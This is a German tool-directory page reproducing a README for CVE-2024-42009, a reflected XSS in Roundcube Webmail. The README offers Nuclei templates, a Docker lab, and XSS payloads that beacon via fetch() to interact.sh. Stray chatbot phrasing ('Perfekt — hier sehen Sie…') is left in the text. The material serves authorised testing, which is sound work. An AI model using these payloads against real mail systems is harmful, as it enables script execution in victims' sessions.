Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-42009 — Nuclei-Vorlagen und Docker-Lab zur Demonstration und Validierung von CVE-2024-42009, einem reflektierten XSS in Roundcube Webmail, unter Verwendung von Out-of-Band-Erkennung über Interactsh für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/shubhankargupta691/cve-2024-42009
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Nuclei-Vorlagen und Docker-Lab zur Demonstration und Validierung von CVE-2024-42009, einem reflektierten XSS in Roundcube Webmail, unter Verwendung von Out-of-Band-Erkennung über Interactsh für autorisierte Tests.

Repository anzeigen
2vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-42009 – Reflektiertes XSS in Roundcube Webmail

📌 Übersicht

Dieses Repository enthält eine Nuclei-Vorlage und unterstützende Ressourcen, um CVE-2024-42009, eine kritische reflektierte XSS-Schwachstelle in Roundcube Webmail, sicher zu demonstrieren und zu validieren. Der Fehler liegt in der Funktion message_body() in show.php, wo Modifikationen nach der Bereinigung zu einer Entsanitisierung und unsicheren Wiedergabe von manipuliertem HTML-E-Mail-Inhalt führen.

⚠️ Dieser PoC ist nur für Bildungszwecke und autorisierte Tests bestimmt. Verwenden Sie ihn nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


🧠 Schwachstellenübersicht

  • CVE-ID: CVE-2024-42009
  • Schweregrad: Kritisch (CVSS 9.8)
  • Betroffene Versionen: Roundcube ≤ 1.6.7 und ≤ 1.5.7
  • Gepatchte Versionen: 1.6.8 und 1.5.8
  • Komponente: message_body() in show.php
  • Auswirkungen: Beliebige JavaScript-Ausführung, wenn ein Benutzer eine bösartige E-Mail ansieht

  • 🧪 Erkennungsstrategie (Nur für Laborgebrauch)

    Dieses Repository verwendet die Out-of-Band (OOB)-Erkennung über Interactsh, um die JavaScript-Ausführung in einer kontrollierten Laborumgebung zu bestätigen.

    Wichtige Schritte:

    1. Stellen Sie eine angreifbare Roundcube-Instanz bereit (z.B. über Docker)
    2. Senden Sie eine präparierte E-Mail mit <body>-Tag, das onanimationstart und einen Beacon an Interactsh enthält
    3. Öffnen Sie die E-Mail in der Roundcube-Benutzeroberfläche
    4. Bestätigen Sie den DNS/HTTP-Callback an die Interactsh-Domain

    🐳 Laboraufbau

    Verwenden Sie die bereitgestellte Docker-Compose-Datei, um eine lokale Roundcube-Instanz mit MailHog (SMTP-Sink) und MariaDB zu starten.

    root@kitploit:~
    git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
    cd CVE-2024-42009
    docker compose up -d
    
    • Roundcube-Benutzeroberfläche: http://localhost:8080
    • MailHog-Benutzeroberfläche: http://localhost:8025
    • Anmeldemethode: Google-Konto

    ⚠️ Verwenden Sie nicht Ihr Google-Konto.


    📁 Repository-Inhalte

    • CVE-2024-42009-OOB.yaml – Nuclei-Vorlage mit Interactsh- und Out-of-Band (OOB)-Erkennung
    • CVE-2024-42009.yaml – Nuclei-Vorlage ohne Interactsh und OOB
    • docker-compose.yml – Einrichtung der Laborumgebung für Roundcube Webmail
    • Images/ – Screenshots, die HTTP/DNS-Treffer von Interactsh zeigen

    🎥 Videodemonstration

    Dieses Video führt durch die gesamte Exploit-Kette:

    • Erstellung des Payloads
    • Senden per E-Mail oder Endpunkt
    • Auslösen der Schwachstelle
    • Bestätigen des Beacons über Interactsh

    (Videodemo)


    Um diese XSS-Payloads verantwortungsvoll in Ihre README aufzunehmen, sollten Sie sie in einem Abschnitt platzieren, der deutlich für Bildungs- oder Testzwecke gekennzeichnet ist. Hier ist eine vorgeschlagene Struktur:


    🧪 XSS-Payload-Beispiele (Nur zu Testzwecken)

    ⚠️ Haftungsausschluss: Diese Payloads sind nur für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Setzen Sie sie nicht auf Systemen ohne ausdrückliche Genehmigung ein.

    root@kitploit:~
    <!-- Image tag with onerror -->
    <img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
    
    <!-- Broken image source with onerror -->
    <img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
    
    <!-- SVG with onload -->
    <svg onload="fetch('https://interact.sh/hit')"></svg>
    
    <!-- Script tag -->
    <script>fetch('https://interact.sh/hit')</script>
    
    <!-- JavaScript in iframe src -->
    
    

    🧭 Verwendung

    • Ersetzen Sie https://interact.sh/hit durch Ihren eigenen Listener-Endpunkt.
    • Verwenden Sie diese in kontrollierten Umgebungen wie lokalen Laboren oder CTF-Plattformen.
    • Überwachen Sie Ihren Endpunkt auf eingehende Anfragen, um die Ausführung zu validieren.

    🛡️ Abhilfe

    Aktualisieren Sie Roundcube auf:

    • 1.6.8 oder 1.5.8
      Diese Versionen entfernen die anfällige Nachbearbeitungslogik und wenden strengere Bereinigung und CSP-Header an.

    📜 Referenzen

    Perfekt — hier sehen Sie einen sauberen und professionellen Referenzen-Abschnitt, den Sie in Ihre README oder E-Mail-Einreichung für CVE-2024-42009 aufnehmen können. Er zitiert alle von Ihnen aufgeführten Quellen, formatiert für Klarheit und Glaubwürdigkeit:


    📚 Referenzen

    • NVD CVE-Eintrag – CVE-2024-42009 – Offizielle Schwachstellenauflistung mit CVSS-Wert und betroffenen Versionen
    • SonarSource Blog – Regierungs-E-Mails in Gefahr – Detaillierte technische Analyse und Exploit-Aufschlüsselung
    • GitHub PoC von DaniTheHack3r – Python-basierter Exploit mit E-Mail-Listener und animationsgesteuertem Payload
    • GitHub PoC von Bhanunamikaze – Automatisierte Payload-Injektion und Exfiltration über HTTP-Listener
    • GitHub PoC von 0xbassiouny1337 – Stored-XSS-Exploit mit Echtzeit-E-Mail-Erfassung und -Decodierung

    Tool herunterladen